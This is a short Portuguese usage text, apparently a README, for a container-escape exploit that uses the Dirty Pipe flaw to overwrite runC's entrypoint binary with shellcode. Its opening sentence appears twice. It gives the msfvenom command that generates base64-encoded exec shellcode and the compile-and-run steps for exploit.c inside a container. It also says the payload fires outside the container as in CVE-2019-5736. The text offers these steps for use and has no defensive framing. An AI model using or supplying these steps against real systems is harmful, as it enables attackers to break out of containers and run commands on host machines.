
Um exploit simples que usa dirtypipe para injetar shellcode no entrypoint do runC para implementar escapes de contêineres.
Um exploit simples que usa dirtypipe para injetar shellcode no entrypoint do runC para implementar escapes de contêineres.
Produza shellcode codificado em base64 usando msf:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
Compile e execute no contêiner; o nome do arquivo sobrescrito é o binário que o runC executará no contêiner (como /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
Dispare o exploit e o shellcode fora do contêiner como em CVE-2019-5736.